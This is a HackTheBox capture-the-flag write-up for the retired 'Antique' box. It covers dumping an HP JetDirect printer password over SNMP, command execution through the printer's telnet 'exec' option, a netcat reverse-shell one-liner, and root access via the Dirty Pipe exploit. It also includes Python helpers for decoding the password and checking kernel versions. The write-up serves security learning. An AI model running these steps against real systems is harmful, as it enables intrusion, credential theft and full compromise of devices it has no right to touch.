HackTheBox: Antique


Finally got VIP. This is an old retired easy box, rated roughly the same difficulty as [[Busqueda]]

I'm going to use 'Guided Mode' if I get stuck, because I want to finish this in about 4 hours.


Only a single open port: telnet on 23.

Enumerating telnet

When I connect to the service via telnet I get a header "HP JetDirect", and then a password prompt. Let me look up what the default password for HP JetDirect is.

It doesn't look like there is a default password, but I stumbled across an exploit specific to JetDirect passwords without actually looking for it: (https://www.exploit-db.com/exploits/22319)

Dumping printer credentials using CVE-2002-1048

Despite knowing the exploit, this took me almost half an hour to do because I have no experience with the SNMP protocol or its utilities. That was a pain in the nuts.

Basically, in this exploit, you query the printer (if 'query' is the right word) for a specific object identifier (OID). For whatever reason, one particular OID responds with hex-encoded credentials on vulnerable printers. I guess some printers store the password as an object?

Either way, I finally got it working. Here's what I did:

$ snmpget -v2c -cprivate -mALL .

iso. = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

Then, to flex my new sed skills, I converted this to a printf-friendly format as follows. First, I copy-pasted everything after "BITS:" to a text file. I named this file hexdump. Then:

$ cat hexdump
50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

$ sed 's/ /\\x/g' hexdump

<notice that the leading '50' does not have the '\x'. Need to manually add that in the next step>

$ printf "\x50\x40\x73\x73\x77\x30\x72\x64\x40\x31\x32\x33\x21\x21\x31\x32\x33\x1\x3\x9\x17\x18\x19\x22\x23\x25\x26\x27\x30\x31\x33\x34\x35\x37\x38\x39\x42\x43\x49\x50\x51\x54\x57\x58\x61\x65\x74\x75\x79\x82\x83\x86\x90\x91\x94\x95\x98\x103\x106\x111\x114\x115\x119\x122\x123\x126\x130\x131\x134\x135"
P@ssw0rd@123!!123       ▒"#%&'01345789BCIPQTWXaetuy��������3614592360145

So to recap the above, I used sed to replace all spaces in the hexdump file with \x, because \xNN is the escape syntax printf accepts for hex bytes.

Then I ran printf with this string (and manually added the first \x) to convert the hex to ASCII.

And there we have it; the printer password appears to be ==P@ssw0rd@123!!123==.
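As an added example (not part of the original write-up), here is the same decoding done in Python instead of sed and printf. net-snmp renders a BITS object as the raw octets in hex followed by the index of every set bit (bit 0 is the top bit of the first octet), so only the first 17 tokens above are bytes; the trailing `1 3 9 17 ...` is a second rendering of the same data, which is why printf produced junk after the password. The sample input below is constructed from the snmpget output above, with the OID left truncated exactly as it appears there.

```python
"""Decode the BITS value that net-snmp prints for the HP JetDirect
password object (CVE-2002-1048) and recover the cleartext password.

Added example, not the write-up's own code. net-snmp prints a BITS
object as hex octets followed by the positions of all set bits; the
split point is found by testing which prefix of octets reproduces the
trailing bit list exactly, so corrupted input is rejected rather than
silently decoded.
"""
import string

# Constructed sample: the snmpget output from the write-up, including the
# line wrap the terminal introduced and the OID truncated as on the page.
SAMPLE_OUTPUT = (
    "iso. = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 \n"
    "33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 "
    "54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 "
    "122 123 126 130 131 134 135\n"
)


def set_bit_positions(octets: bytes) -> list[int]:
    """Return the indexes of set bits, SNMP BITS style (bit 0 = MSB of octet 0)."""
    positions = []
    for i, byte in enumerate(octets):
        for b in range(8):
            if byte & (0x80 >> b):
                positions.append(8 * i + b)
    return positions


def split_bits_value(tokens: list[str]) -> tuple[bytes, list[int]]:
    """Split the tokens after 'BITS:' into (octets, bit positions).

    Every prefix length is tried; the correct one is the prefix whose
    set-bit positions equal the remaining tokens. Raises ValueError if
    no prefix is consistent (truncated or mangled output).
    """
    for k in range(1, len(tokens) + 1):
        head, tail = tokens[:k], tokens[k:]
        # Octets are always printed as exactly two hex digits; once a token
        # breaks that rule no longer prefix can be valid either.
        if not all(len(t) == 2 and all(c in string.hexdigits for c in t) for t in head):
            break
        if not all(t.isdigit() for t in tail):
            continue
        octets = bytes(int(t, 16) for t in head)
        bits = [int(t) for t in tail]
        if set_bit_positions(octets) == bits:
            return octets, bits
    raise ValueError("token list is not a consistent net-snmp BITS rendering")


def decode_bits_line(output: str) -> tuple[bytes, list[int]]:
    """Parse raw snmpget output (possibly line-wrapped) into octets and bit list."""
    if "BITS:" not in output:
        raise ValueError("no BITS value in output")
    payload = output.split("BITS:", 1)[1]
    return split_bits_value(payload.split())  # split() also joins the wrapped lines


def jetdirect_password(output: str) -> str:
    """Recover the cleartext password: the octets are the ASCII password bytes."""
    octets, _ = decode_bits_line(output)
    return octets.decode("ascii")


if __name__ == "__main__":
    octets, bits = decode_bits_line(SAMPLE_OUTPUT)
    print("octets  :", octets.hex(" "))
    print("bits    :", bits)
    print("password:", jetdirect_password(SAMPLE_OUTPUT))
```

Running it prints the 17 octets, the bit list and the recovered password. The prefix search doubles as an integrity check: any copy-paste damage to either half of the output makes the two renderings disagree and the decoder refuses to return a password.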

Searching for RCE

This is a weird one... I don't really know what to do inside a printer. I looked on searchsploit for "jetdirect", and one that popped up was an RCE path traversal vulnerability that had a metasploit module. I'll give this a shot.

$ msfconsole

msf6 > use exploit/linux/misc/hp_jetdirect_path_traversal

msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > options

Module options (exploit/linux/misc/hp_jetdirect_path_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      9100             yes       The target port (TCP)
   SNMPPORT   161              yes       The SNMP port
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TIMEOUT    1                yes       SNMP Timeout
   URIPATH                     no        The URI to use for this exploit (default is random)
   VERSION    1                yes       SNMP Version <1/2c>

   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST          yes       The local host or network interface to listen on. This must be an address on the local machine or to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.

Payload options (cmd/unix/bind_busybox_telnetd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LOGIN_CMD  /bin/sh          yes       Command telnetd will execute on connect
   LPORT      4444             yes       The listen port
   RHOST                       no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)

msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set RHOSTS
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set COMMUNITY private
COMMUNITY => private
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set SNMPPORT 23
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set RPORT 23

For whatever fucked-up reason, this metasploit module apparently doesn't account for the fact that a password might be set up. So I can't use this, at least not without some modification. I could also check GitHub for other PoCs for this CVE. But if that fails, I can just read the metasploit module code and do it myself by hand.

Or maybe I can disable the password inside the printer? Let's try that first.

The closest thing I saw was to whitelist an IP address using allow: <ip>

Using the printer's shell

Like an idiot, I missed this option when I was viewing the help menu on the printer's telnet interface. But you can run system commands using exec.

Please type "?" for HELP
> ? 

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)

addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)

exec: execute system commands (exec id)
exit: quit from telnet session

There it is, down at the bottom.

> exec ls

> exec whoami

Damn, that's pretty cool that these have actual Linux shells. I suppose that renders the metasploit thing redundant, since I already have RCE through this.

Let me spawn a busybox-style reverse shell:

> exec rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

On my local machine:

$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 59416
/bin/sh: 0: can't access tty; job control turned off

$ whoami

Upgrading the reverse shell: Doing it the right way

I never really try the tty upgrade stuff on reverse shells, because the zsh shell Kali uses doesn't seem to like the tty commands.

But I'm going to give it another shot. I'll switch to bash and try it that way.

$ bash

$nc -nlvp 1234
connect to [] from (UNKNOWN) [] 59418
/bin/sh: 0: can't access tty; job control turned off
$ export TERM=xterm

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

<background the revshell with CTRL-Z>

kali@kali: stty raw -echo
kali@kali: fg <you wont actually see the prompt here>

lp@antique:~$ reset <this corrects the format>

Beautiful. That's the first time I've done that successfully. Now I have tab-completion on the revshell.

Enumerating from inside the printer shell

The first thing I checked was for sudo permissions, which didn't work because I don't know this user's password.

The second check was for interesting SUID binaries, but there were no useful ones.

The third check was for the kernel version, which was 5.13.0. Now THAT's useful; this version is vulnerable to the Dirty Pipe exploit.
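To make that kernel-version check repeatable, here is an added Python triage helper (my example, not the write-up's) that classifies a `uname -r` string against the Dirty Pipe (CVE-2022-0847) affected range: the vulnerable splice code arrived in 5.8, the upstream fix shipped in 5.16.11, 5.15.25 and 5.10.102, and every mainline release from 5.17 on contains it. The branch boundaries are taken from the upstream fix; the sample version strings are constructed. The verdict is deliberately "likely" because distribution kernels backport fixes without bumping the version string, so a final answer needs the distro's security tracker.

```python
"""Classify a Linux kernel version string against the Dirty Pipe
(CVE-2022-0847) affected range.

Added triage example, not from the write-up. Version boundaries come
from the upstream fix; it cannot see distro backports, hence 'likely'.
"""
import re

INTRODUCED = (5, 8, 0)        # vulnerable splice()/pipe change first shipped in 5.8
FIXED_IN_STABLE = {           # stable branches that got the fix: first fixed patch level
    (5, 10): 102,
    (5, 15): 25,
    (5, 16): 11,
}
FIXED_MAINLINE = (5, 17)      # every mainline release from 5.17 onward contains the fix
BACKPORT_NOTE = "confirm against the distro security tracker, backports keep the old version string"


def parse_kernel_version(uname_r: str) -> tuple[int, int, int]:
    """Turn '5.13.0-40-generic' (or '5.13.0', '5.13') into (5, 13, 0), ignoring the distro suffix."""
    m = re.match(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?", uname_r)
    if not m:
        raise ValueError(f"unrecognised kernel version string: {uname_r!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def dirty_pipe_status(uname_r: str) -> tuple[bool, str]:
    """Return (likely_vulnerable, reason) for the given kernel version string."""
    major, minor, patch = parse_kernel_version(uname_r)
    if (major, minor, patch) < INTRODUCED:
        return False, "predates 5.8, vulnerable code not present"
    if (major, minor) >= FIXED_MAINLINE:
        return False, "mainline release at or after 5.17 includes the fix"
    fixed_patch = FIXED_IN_STABLE.get((major, minor))
    if fixed_patch is None:
        # 5.8, 5.9 and 5.11-5.14 went end-of-life without an upstream fix (5.13.0 on this box).
        return True, f"{major}.{minor} branch never received an upstream fix; {BACKPORT_NOTE}"
    if patch >= fixed_patch:
        return False, f"stable fix present (>= {major}.{minor}.{fixed_patch})"
    return True, f"fix landed in {major}.{minor}.{fixed_patch}; {BACKPORT_NOTE}"


if __name__ == "__main__":
    # Constructed sample version strings, including the one found on the box.
    for v in ["5.13.0", "5.10.101", "5.10.102-1", "5.15.25-generic", "5.4.0-100", "6.1.0"]:
        vulnerable, reason = dirty_pipe_status(v)
        print(f"{v:18} {'VULNERABLE' if vulnerable else 'ok':10} {reason}")
```

The per-branch table is the part worth keeping current when reusing this shape for other kernel CVEs: a plain "version less than X" comparison gets long-term-support branches wrong in both directions.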

Priv esc: the 'Dirty Pipe' exploit

This couldn't have been easier, to be honest.

I didn't even need to download the code. On my local machine I ran

$ searchsploit -x linux/local/50808.c >> dirtypipe.c

to dump the source code stored in searchsploit to a C file. I transferred this to the victim by hosting a Python HTTP server and using wget.

On the victim I compiled it and ran it, attempting to hijack the pkexec SUID binary:

lp@antique:~$ gcc dirtypipe.c -o dirtypipe

lp@antique:~$ which pkexec

lp@antique:~$ ./dirtypipe /usr/bin/pkexec
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))

# whoami